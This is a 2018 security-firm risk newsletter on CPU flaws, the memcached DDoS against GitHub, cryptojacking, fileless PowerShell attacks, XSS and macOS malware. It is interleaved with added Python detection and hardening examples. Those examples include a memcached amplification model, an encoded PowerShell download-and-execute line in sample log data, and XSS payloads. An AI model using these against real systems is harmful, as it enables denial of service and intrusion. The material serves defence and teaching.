
CYBER SECURITY RISK RADAR, APRIL 2018

CONTENTS
Executive summary
New year, new hardware vulnerabilities and threats
GitHub hit with biggest DDoS attack ever reported
Modern-day gold rush: Cryptojacking goes mainstream
Fileless attacks get a boost from PowerShell
Cross-site scripting continues to call for patching
MacOS loses its reputation as impenetrable fortress
Quarterly report spotlight: ENISA

THE RISK RADAR APRIL 2018

Executive summary

The first fiscal quarter of 2018 has drawn to a close, but not without leaving a trail of cyber security risks in its wake. Here is a brief summary of them all:

- The Meltdown and Spectre vulnerabilities continue to garner headlines as Microsoft and Intel work to patch the remaining exploitable variants.
- GitHub was hit with the biggest DDoS attack ever reported, yet managed to recover in under 20 minutes.
- Hackers are increasingly latching onto cryptojacking through every available means (dropped mining software, fileless techniques and browser plugins) as a way to monetise their efforts without paying for their own mining hardware or electricity.
- Fileless attacks hit the Winter Olympics in South Korea, underscoring the danger of legitimate programs that can conceal malicious activity.
- Cross-site scripting was one of the most common vulnerabilities among the 1,002 vulnerabilities recorded in the first annual Integrity360 2018 Penetration Testing Report.
- The perception that macOS users don't have to worry about cyber threats has turned into a misconception, as researchers have recently seen an uptick in malware designed for the operating system.

Let's take a closer look at the developments that cyber security analysts should monitor throughout 2018.

New year, new hardware vulnerabilities and threats

The common vulnerabilities and exposures (CVEs) dubbed Meltdown and Spectre were revealed in early January 2018 and dominated news headlines. The discovery that unprivileged code could use the processor's speculative execution to read memory it should never see, including kernel memory, has led to a series of patches from Microsoft and Intel as they try to contain the problem.

Total Meltdown, a vulnerability introduced by Microsoft's own patch for Meltdown, was discovered in late March. It affected 64-bit Windows 7 and Windows Server 2008 R2 systems that had installed the January or February 2018 updates, and it points to the challenge these two problems represent: a fix for a hardware flaw can itself open a software one.

In March 2018, further flaws were announced in processor chips that could potentially allow hackers to manipulate the devices they power.

360 Insight

The risks point to the fact that sophisticated hacking groups could leverage these exploits as they become more common and more reliable.

One environment where these vulnerabilities matter most is virtualised infrastructure: a tenant who can exploit a speculative execution flaw may be able to read memory belonging to the hypervisor or to other guests on the same host. Patching regularly (operating system, hypervisor and CPU microcode), as well as applying emergency patches, can help mitigate exposure.

IT departments must be aware of any CVEs involving devices in use by the workforce, and adjust cyber security policies accordingly.

Meltdown, Spectre and CPU flaws highlight Q1 hardware risks.

GitHub hit with biggest DDoS attack ever reported

The popular software development platform GitHub suffered a massive distributed denial of service attack on February 28, 2018. The flood of traffic sent to the website peaked at 1.35 terabits per second (Tbps).

Days later, a 1.7 Tbps reflection/amplification attack targeted a customer of a US-based service provider, using the same attack vector as the GitHub attack.

GitHub was able to resolve the situation in less than 20 minutes thanks to the DDoS mitigation platform it had in place, while the 1.7 Tbps attack on the service provider's customer caused no reported outages. This successful remediation is a sign of the tremendous shift in cyber security strategies over the past two years.

360 Insight

These DDoS attacks abused memcached servers that had been left exposed to the internet with their UDP listener enabled. Memcached answers over UDP without any handshake, so an attacker can send small requests with a forged source address (the victim's) and the servers reply to the victim with responses many thousands of times larger than the request. This is why the amplification factor for memcached far exceeds that of the DNS and NTP reflection attacks seen in earlier years.

The scale of the attacks could easily bring down vulnerable networks. Ensure that your DDoS protection service level agreement explicitly states how quickly the platform can respond to attacks to mitigate negative impacts, such as service disruption for clients. Every minute your website is down may have a financial and reputational cost attached to it. If you run memcached yourself, disable the UDP listener unless you need it, and never expose the service outside a trusted network.

Traffic to GitHub peaked at 1.35 Tbps.
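To make the amplification mechanism concrete, here is an added example (not code from the report or from GitHub) that models the memcached UDP wire format: the 8-byte frame header, a one-datagram request, a simulated reflector that answers a "get" with a large cached value, and the resulting bytes-out-per-byte-in ratio. The reflector, the cached value and the 1400-byte per-datagram payload limit are constructed for the model; the final helper reads a memcached command line to tell whether the UDP listener is on.

```python
import struct

# memcached UDP frame header: four 16-bit big-endian fields holding the
# request ID, sequence number, total number of datagrams and a reserved word (0).
HEADER = struct.Struct("!HHHH")
# Payload bytes per reply datagram used by the simulated reflector below.
# Assumption for the model: real memcached caps UDP datagrams at roughly 1400 bytes.
MAX_PAYLOAD = 1400


def build_udp_request(request_id, command=b"stats\r\n"):
    """Build the single small datagram an attacker sends (with a forged source)."""
    return HEADER.pack(request_id, 0, 1, 0) + command


def parse_udp_frame(datagram):
    """Split a datagram into (request_id, seq, total, payload); reject bad headers."""
    if len(datagram) < HEADER.size:
        raise ValueError("datagram shorter than the 8-byte memcached UDP header")
    request_id, seq, total, reserved = HEADER.unpack_from(datagram)
    if reserved != 0 or total == 0 or seq >= total:
        raise ValueError("malformed memcached UDP header")
    return request_id, seq, total, datagram[HEADER.size:]


def reassemble(datagrams, request_id):
    """Join, in sequence order, the payloads of the reply to one request ID."""
    frames, total = {}, None
    for d in datagrams:
        rid, seq, tot, payload = parse_udp_frame(d)
        if rid == request_id:
            frames[seq], total = payload, tot
    if total is None or len(frames) != total:
        raise ValueError("incomplete response")
    return b"".join(frames[i] for i in range(total))


def simulate_reflector(request_datagram, store):
    """Constructed model of an exposed memcached UDP listener answering 'get <key>'.

    The reply is addressed to the datagram's source, which the attacker has set
    to the victim; that is what turns a 15-byte 'get' into a flood of large replies."""
    request_id, _, _, payload = parse_udp_frame(request_datagram)
    parts = payload.split()
    if parts and parts[0] == b"get":
        body = b""
        for key in parts[1:]:
            if key in store:
                body += b"VALUE %s 0 %d\r\n%s\r\n" % (key, len(store[key]), store[key])
        body += b"END\r\n"
    else:
        body = b"ERROR\r\n"  # the model only implements 'get'
    chunks = [body[i:i + MAX_PAYLOAD] for i in range(0, len(body), MAX_PAYLOAD)]
    return [HEADER.pack(request_id, seq, len(chunks), 0) + c
            for seq, c in enumerate(chunks)]


def amplification_factor(request_datagram, response_datagrams):
    """Bytes the reflector emits toward the victim per byte the attacker sent."""
    return sum(len(d) for d in response_datagrams) / len(request_datagram)


def udp_listener_enabled(argv, default=True):
    """Read a memcached command line: '-U 0' (or '-U0') turns UDP off, any other
    '-U <port>' turns it on, and no -U means the build default (on before
    memcached 1.5.6, off from 1.5.6 on), which the caller passes as 'default'."""
    for i, arg in enumerate(argv):
        if arg == "-U" and i + 1 < len(argv):
            return argv[i + 1] != "0"
        if arg.startswith("-U") and len(arg) > 2:
            return arg[2:] != "0"
    return default


def demo():
    """Attacker sends one 'get k' for a 100 kB value; measure what the victim receives."""
    store = {b"k": b"A" * 100_000}          # constructed cached value
    request = build_udp_request(7, b"get k\r\n")
    replies = simulate_reflector(request, store)
    return len(request), len(replies), amplification_factor(request, replies)
```

With a 100 kB value the 15-byte request draws 72 datagrams totalling just over 100 kB, a factor of roughly 6,700; attackers first plant a value close to memcached's 1 MB item limit, which is where the tens-of-thousands-fold figures come from. The operational check is the last function: a process list showing memcached without "-U 0" on a pre-1.5.6 build is a reflector waiting to be found.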

Modern-day gold rush: Cryptojacking goes mainstream

Rising exchange rates for cryptocurrencies like Bitcoin have pushed cryptojacking to the forefront of hackers' favourite methodologies. As the spotlight on ransomware grows brighter, and an unwillingness to pay cybercriminals develops, hackers are turning to cryptojacking as a way to slip into networks undetected and still generate a financial profit from their activities. They accomplish this through dropped mining software, fileless techniques and infected browser extensions.

An average of 644,000 devices unknowingly encountered coin-mining software each month between September 2017 and January 2018, according to Microsoft. A single campaign on March 6, 2018, saw a program named Dofoil infect over 500,000 computers in less than 12 hours. It was only discovered in February that one hacker had successfully mined over $3 million worth of the digital currency Monero after going undetected on Jenkins servers for 18 months.

360 Insight

Cryptojacking presents both internal and external risks. If you find cryptominers on your network, you should be concerned that they were able to infiltrate it in the first place. Similarly, employees have been found mining cryptocurrencies on their corporate PCs, which can leave the company with elevated electricity bills and create further vulnerabilities on the network.

Cyber security analysts should continue to monitor their networks in real time and build a whitelist of known software programs so that they can quickly identify and isolate cryptojacking software. Miners betray themselves in ways that are easy to check for: sustained CPU use, connections to mining pools (usually over the Stratum protocol) and binaries running from unusual paths or under borrowed system-process names.

Dofoil infected over 500,000 computers in less than 12 hours.
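The whitelist-plus-indicators approach above, as an added example rather than anything from the report: a scan over process-creation records that flags command lines carrying miner traits (the Stratum URL scheme, XMRig's binary name and donate option, Monero coin or algorithm names, ports commonly used by public mining pools) and images that borrow a Windows system binary's name while running outside System32. The process records, hostnames, paths and whitelist are constructed for the example; the indicator list is a heuristic starting point, not a signature set.

```python
import re

# Constructed process-creation records for the example; the paths, users and
# command lines are invented, not real telemetry.
SAMPLE_PROCESSES = [
    {"host": "ws-014", "user": "jdoe",
     "image": "C:\\Windows\\System32\\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},
    {"host": "ws-014", "user": "jdoe",
     "image": "C:\\Users\\Public\\Libraries\\wuauclt.exe",
     "cmdline": "wuauclt.exe -o stratum+tcp://pool.example.net:3333 "
                "-u 4AexampleWalletAddress --donate-level=1 -k"},
    {"host": "build-02", "user": "jenkins",
     "image": "/usr/bin/java",
     "cmdline": "java -jar /opt/jenkins/jenkins.war --httpPort=8080"},
    {"host": "build-02", "user": "jenkins",
     "image": "/tmp/.cache/xmrig",
     "cmdline": "/tmp/.cache/xmrig -o pool.example.net:14444 --coin monero -B"},
    {"host": "ws-022", "user": "asmith",
     "image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "cmdline": "chrome.exe --type=renderer --lang=en-GB"},
]

# The whitelist of images approved to run on these hosts (constructed).
ALLOWLIST = {
    "C:\\Windows\\System32\\svchost.exe",
    "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
    "/usr/bin/java",
}

# Heuristics rather than signatures: the Stratum mining protocol's URL scheme,
# the open-source XMRig miner's binary name and options, Monero coin/algorithm
# names, and TCP ports commonly used by public mining pools.
MINER_INDICATORS = [
    (re.compile(r"stratum\+(?:tcp|ssl|udp)://", re.I), "stratum pool URL"),
    (re.compile(r"(?:^|[\\/\s])xmrig(?:\.exe)?\b", re.I), "xmrig binary name"),
    (re.compile(r"--donate-level", re.I), "xmrig donate option"),
    (re.compile(r"--coin[=\s]+monero\b|\bcryptonight\b|\brandomx\b", re.I),
     "monero coin or algorithm"),
    (re.compile(r":(?:3333|4444|5555|7777|14444)\b"), "common mining pool port"),
]

# Names of Windows system binaries that miners like to borrow; the genuine
# ones live under System32.
WINDOWS_SYSTEM_NAMES = {"svchost.exe", "wuauclt.exe", "lsass.exe", "csrss.exe"}


def masquerades_as_system_binary(image):
    """True when a System32 binary name runs from somewhere other than System32."""
    name = image.rsplit("\\", 1)[-1].lower()
    return name in WINDOWS_SYSTEM_NAMES and not image.lower().startswith(
        "c:\\windows\\system32\\")


def scan_processes(processes, allowlist=ALLOWLIST, indicators=MINER_INDICATORS):
    """One finding per process whose command line or image path looks like a miner.

    An allow-listed image that still matches is reported as well: either the
    whitelist is wrong or a legitimate path has been replaced, so check the hash."""
    findings = []
    for p in processes:
        reasons = [desc for rx, desc in indicators if rx.search(p["cmdline"])]
        if masquerades_as_system_binary(p["image"]):
            reasons.append("system binary name outside System32")
        if reasons:
            findings.append({"host": p["host"], "user": p["user"],
                             "image": p["image"],
                             "allowlisted": p["image"] in allowlist,
                             "reasons": reasons})
    return findings


def hosts_to_isolate(findings):
    """Hosts with at least one finding, for the network team."""
    return sorted({f["host"] for f in findings})
```

Run against the sample it returns two findings, one per host: the fake wuauclt.exe on the workstation (pool URL, donate option, pool port, wrong directory) and the xmrig binary on the Jenkins build server, which mirrors the 18-month Jenkins case above: a build host with legitimate sustained CPU load is exactly where a miner hides best, so the indicators matter more than the load.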

Fileless attacks get a boost from PowerShell

Fileless attacks have grown in frequency in 2018. A growing number of hackers are turning to PowerShell, Microsoft's task automation and scripting tool, to carry out their actions while hiding behind the guise of legitimate administrative activity: no malicious executable touches disk, so there is nothing for a file scanner to find.

In February 2018, Olympic officials reported that a cyber attack hit the Winter Olympics' opening ceremony in Pyeongchang, South Korea, Reuters reported. It was later revealed that the hackers leveraged PowerShell to carry out the attack, which impacted the organisation's website and the Wi-Fi access it had set up in the area.

360 Insight

Malicious activity concealed by legitimate programs can be detrimental to companies that rely on signature-based detection mechanisms, as hackers are able to easily modify their attack to bypass traditional security controls. PowerShell makes this especially easy: a command can be base64-encoded on the command line, fetched from a remote server and executed in memory, and none of those steps produces a file with a signature to match.

Real-time analysis of endpoint telemetry, in particular PowerShell script block logging and process-creation events with full command lines, fed into a security information and event management (SIEM) platform will be a staple of high-performing security operations moving forward. It provides the visibility necessary to correlate potentially dangerous behaviour with common vulnerabilities and exposures.

Fileless attacks are getting help from legitimate programs like PowerShell.
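Here is the kind of detection logic the Insight calls for, written as an added example (not the report's own code) over constructed process-creation records: it finds an -EncodedCommand argument, decodes it the way PowerShell does (base64 over UTF-16LE), and scores both the raw command line and the decoded payload against the traits of a fileless stager: in-memory execution, a download cmdlet, profile suppression, a hidden window, an execution policy bypass and the encoding itself. The log shape, hostnames and the 192.0.2.10 address are made up for the example.

```python
import base64
import re

# Patterns that, together, characterise a fileless PowerShell stager.
SUSPICIOUS = [
    (re.compile(r"\biex\b|invoke-expression", re.I), "dynamic code execution"),
    (re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b",
                re.I), "remote payload download"),
    (re.compile(r"frombase64string", re.I), "embedded base64 payload"),
    (re.compile(r"(?:^|\s)-(?:nop|noprofile)\b", re.I), "profile suppressed"),
    (re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"(?:^|\s)-(?:ep|executionpolicy)\s+bypass\b", re.I),
     "execution policy bypassed"),
    (re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+[A-Za-z0-9+/=]{16,}", re.I),
     "encoded command"),
]
# PowerShell accepts any unambiguous prefix of -EncodedCommand, hence the alternatives.
ENCODED = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_command(script):
    """Encode a script the way -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument, or None if absent/invalid."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline):
    """Score one PowerShell command line, matching against the decoded payload too."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    reasons = [desc for rx, desc in SUSPICIOUS if rx.search(text)]
    return {"decoded": decoded, "reasons": reasons, "score": len(reasons)}


# Constructed log records in a 'host=... user=... cmd=...' shape (not real events;
# 192.0.2.10 is a documentation address).
SAMPLE_LOG = [
    "host=ws-031 user=jdoe cmd=powershell.exe -File C:\\scripts\\nightly-backup.ps1",
    "host=ws-031 user=jdoe cmd=powershell.exe -nop -w hidden -enc " + encode_command(
        "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"),
    "host=srv-07 user=svc cmd=powershell.exe -ExecutionPolicy Bypass "
    "-Command \"Get-Service | Export-Csv C:\\temp\\services.csv\"",
]


def parse_record(line):
    """Pull host, user and the full command line out of one sample record."""
    host = re.search(r"host=(\S+)", line).group(1)
    user = re.search(r"user=(\S+)", line).group(1)
    cmd = line.split("cmd=", 1)[1]
    return host, user, cmd


def triage(lines, threshold=3):
    """Records whose score reaches the threshold, with the decoded payload attached."""
    hits = []
    for line in lines:
        host, user, cmd = parse_record(line)
        result = analyze_command_line(cmd)
        if result["score"] >= threshold:
            hits.append({"host": host, "user": user, **result})
    return hits
```

Only the encoded download-and-execute line clears the threshold (five traits); the signed backup script scores zero and the admin's one-off execution policy bypass scores one, which is the point of scoring on combinations rather than alerting on any single flag. Wire the same logic to script block logging (Event ID 4104) and the decoded payload is delivered to you by PowerShell itself, including for scripts that never appear on a command line.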

Cross-site scripting continues to call for patching

Integrity360 penetration testers found cross-site scripting to be the second most common vulnerability among clients in 2017, just behind SSL vulnerabilities, of which several kinds were found.

Vendors like Adobe, Drupal and Microsoft have all released new patches for cross-site scripting flaws as recently as March 2018, with the hope of mitigating exposure. Although the severity of cross-site scripting findings hovers around low to moderate risk, the fact that it is always on their radar shows its pervasiveness as a challenge for cyber security professionals.

360 Insight

Hackers use cross-site scripting to target organisations with simple or no defence mechanisms in place. These are commonly companies in the healthcare and financial industries, where some businesses only seek to meet compliance.

Regular penetration testing, as well as threat and vulnerability assessments, can help enterprises ensure their website won't contribute to a data breach through cross-site scripting. Vendor patches only cover third-party products; in code you write yourself, the root cause is untrusted input written into a page without encoding for the context it lands in (HTML body, attribute, URL or script), and the fix is context-aware output encoding backed by a Content Security Policy.

Cross-site scripting was the second most common vulnerability found in our penetration tests.
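The vulnerable pattern and its fix side by side, as an added example that is not from the report: a search page that echoes the query into the HTML body, the same page with the body and attribute contexts escaped, a URL-context check (escaping alone does not stop a "javascript:" link), and a Content Security Policy header as the backstop. The page markup, the payloads and the policy values are constructed for the example.

```python
import html
from urllib.parse import urlsplit


def render_results_vulnerable(query):
    """Untrusted input dropped straight into the HTML body: reflected XSS."""
    return f"<p>Results for: {query}</p>"


def render_results_safe(query):
    """HTML body context: escape &, <, >, " and ' so the browser shows text, not markup."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def render_input_safe(value):
    """Quoted attribute context: the same escaping keeps the value inside the quotes."""
    return f'<input type="text" name="q" value="{html.escape(value, quote=True)}">'


def safe_href(url):
    """URL context: escaping is not enough, because 'javascript:' survives it.

    Allow only http(s) URLs and site-relative paths; anything else becomes '#'."""
    url = url.strip()
    parts = urlsplit(url)
    if parts.scheme in ("http", "https") and parts.netloc:
        return html.escape(url, quote=True)
    if not parts.scheme and url.startswith("/") and not url.startswith("//"):
        return html.escape(url, quote=True)
    return "#"


def render_link_safe(url, label):
    """Anchor with both the URL and the visible label handled for their contexts."""
    return f'<a href="{safe_href(url)}">{html.escape(label, quote=True)}</a>'


# A Content Security Policy as defence in depth: even an encoding mistake cannot
# load or run a script the page did not ship itself.
CSP_HEADER = ("Content-Security-Policy",
              "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'")


def demo_payloads():
    """Run the classic payloads through both renderers; returns what the browser would see."""
    body = "<script>alert(document.cookie)</script>"
    attr = '" autofocus onfocus="alert(1)'
    link = "javascript:alert(1)"
    return {
        "vulnerable": render_results_vulnerable(body),
        "safe_body": render_results_safe(body),
        "safe_attr": render_input_safe(attr),
        "safe_link": render_link_safe(link, "click"),
    }
```

The attribute payload is the one that catches people who escape only angle brackets: it never uses "<", it simply closes the quoted value and adds an event handler, which is why html.escape is called with quote=True throughout. A CSP without 'unsafe-inline' in script-src would have stopped all three payloads even if the encoding had been forgotten.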

MacOS loses its reputation as impenetrable fortress

In the past, Mac computer users haven't had to watch out for too many potential threats. In 2018 that is turning into a misconception: Mac malware increased by roughly 270 percent in 2017, according to Malwarebytes, and at least four new threats have been discovered so far in Q1 2018.

Coldroot, a remote-access Trojan, was identified as a threat to Mac users in February 2018. It is inherently limited because it needs accessibility rights to perform malicious activities on a wide scale, but it was still able to function as a hidden keylogger on many devices for nearly two years.

360 Insight

Companies with a limited number of Mac users may have turned a blind eye to their activities in order to support other critical areas of the business, but this shouldn't be the case moving forward.

macOS should be incorporated into formal cyber security policies if it isn't already; it is an overlooked endpoint that can allow a hacker free entry to cause havoc on the network. Accessibility rights are a good example of what such a policy should cover: they let an application observe and inject keystrokes and drive other applications, so the list of apps holding them should be known, short and reviewed. Schedule macOS build reviews to coincide with penetration testing services that will explicitly seek out vulnerabilities in the devices on your network.

Attacks on Mac computers increased 270 percent in 2017.
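Since Coldroot depends on holding accessibility rights, the practical check is to audit which clients have been granted kTCCServiceAccessibility in the TCC database and compare them with a sanctioned list. The following is an added example, not code from the report or from any Apple tool; it assumes the pre-Big Sur layout of the "access" table (service, client, client_type, allowed, prompt_count) and runs against an in-memory copy with constructed rows and invented bundle identifiers, so it works offline. The real database path and the read-only open are included for running it on a Mac as root.

```python
import sqlite3

# Real location of the TCC database on macOS (root-only to read; also protected
# by SIP from Mojave onward, so audit it from an MDM agent or as an admin).
TCC_DB_PATH = "/Library/Application Support/com.apple.TCC/TCC.db"
ACCESSIBILITY = "kTCCServiceAccessibility"

# Schema assumption: the 'access' table layout used by macOS releases before
# Big Sur. client_type is 0 for a bundle identifier and 1 for an absolute path.
# Later releases replaced 'allowed' with 'auth_value'; adjust the query for those.
SAMPLE_SCHEMA = """
CREATE TABLE access (
    service TEXT NOT NULL,
    client TEXT NOT NULL,
    client_type INTEGER NOT NULL,
    allowed INTEGER NOT NULL,
    prompt_count INTEGER NOT NULL,
    PRIMARY KEY (service, client, client_type)
);
"""

# Constructed rows: the bundle identifiers below are invented for the example.
SAMPLE_ROWS = [
    ("kTCCServiceAccessibility", "com.example.corp-automation", 0, 1, 1),
    ("kTCCServiceAccessibility", "com.example.audiodriver", 0, 1, 0),
    ("kTCCServiceAccessibility", "com.example.oldtool", 0, 0, 1),
    ("kTCCServiceCamera", "com.example.meetings", 0, 1, 1),
]

# Applications the organisation has sanctioned to hold accessibility rights (constructed).
SANCTIONED = {"com.example.corp-automation"}


def open_sample_db():
    """In-memory stand-in for TCC.db so the audit runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SCHEMA)
    conn.executemany("INSERT INTO access VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def open_real_db(path=TCC_DB_PATH):
    """Read-only handle on the live database (needs root on a real Mac)."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)


def accessibility_grants(conn):
    """Every client currently allowed the accessibility service."""
    rows = conn.execute(
        "SELECT client, client_type, prompt_count FROM access "
        "WHERE service = ? AND allowed = 1 ORDER BY client", (ACCESSIBILITY,))
    return [{"client": c, "client_type": t, "prompt_count": p} for c, t, p in rows]


def unexpected_grants(conn, sanctioned=SANCTIONED):
    """Grants held by anything not on the sanctioned list: the finding to act on."""
    return [g for g in accessibility_grants(conn) if g["client"] not in sanctioned]


def audit(conn, sanctioned=SANCTIONED):
    """Summary suitable for a build review: who holds the right, and who should not."""
    grants = accessibility_grants(conn)
    return {"grants": [g["client"] for g in grants],
            "unexpected": [g["client"] for g in grants if g["client"] not in sanctioned]}
```

On the sample the audit lists two holders and flags com.example.audiodriver as unexpected; the denied row and the camera grant are ignored. Because the sanctioned list is the whole control, keep it in the macOS policy the Insight asks for and rerun the audit as part of each build review.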

Quarterly report spotlight: ENISA

There's never a dull moment in the cyber security industry, and the reason behind that is the great work being done behind the scenes to bring important issues to the public spotlight.

You won't want to miss the latest report on the 2017 cyber security threat landscape released by the European Union Agency for Network and Information Security (ENISA).

The report covers the most important trends and news that hit the industry in 2017, including its ranking of the top 15 threats to organisations. These are:

1. Malware
2. Web-based attacks
3. Web application attacks
4. Phishing
5. Spam
6. Denial of service
7. Ransomware
8. Botnets
9. Insider threats
10. Physical manipulation/damage/theft/loss
11. Data breaches
12. Identity theft
13. Information leakage
14. Exploit kits
15. Cyber-espionage

You can find the rest of the ENISA 2017 Threat Landscape Report here.

ENISA found malware, web-based attacks and web application attacks to be the three biggest threats to companies.

HEAD OFFICE
3rd Floor, Block D, The Concourse, Beacon Court, Sandyford, Dublin 18. +353 (0)1 293 4027

LONDON OFFICE
90 Long Acre, Covent Garden, London, WC2E 9RZ. +44 203 397 3414

BIRMINGHAM OFFICE
TS2 Pinewood Business Park, Coleshill Road, Birmingham, B37 7HG. +44 203 397 3414

NEW YORK OFFICE
260 Madison Avenue, 8th Floor, Manhattan, 10016. +1-212-461-3286
